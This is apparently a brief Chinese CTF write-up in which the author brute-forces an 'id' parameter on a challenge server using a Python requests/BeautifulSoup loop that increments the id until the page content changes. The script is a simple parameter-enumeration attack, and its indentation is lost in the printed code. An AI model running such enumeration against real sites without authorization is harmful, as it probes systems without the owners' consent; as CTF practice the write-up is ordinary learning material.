前言
这题我真的不知道为什么是爆破id,但是我可以不用burpsuite去爆破id,哈哈哈哈。
上代码:
import requests
from bs4 import BeautifulSoup
from urllib import request
url = 'http://111.198.29.45:42567/index.php?id='
a = url + '1'
res = request.urlopen(a)
soup = BeautifulSoup(res,"html.parser")
i = 2
while True:
print("try",i,".......")#怕出事,打点东西在屏幕上
URL = url + str(i)
re = request.urlopen(URL)
ssoup = BeautifulSoup(re,"html.parser")
if ssoup != soup:
print(i,"is access")
break
i += 1
随手打的,没动脑。肯定有更好的方法。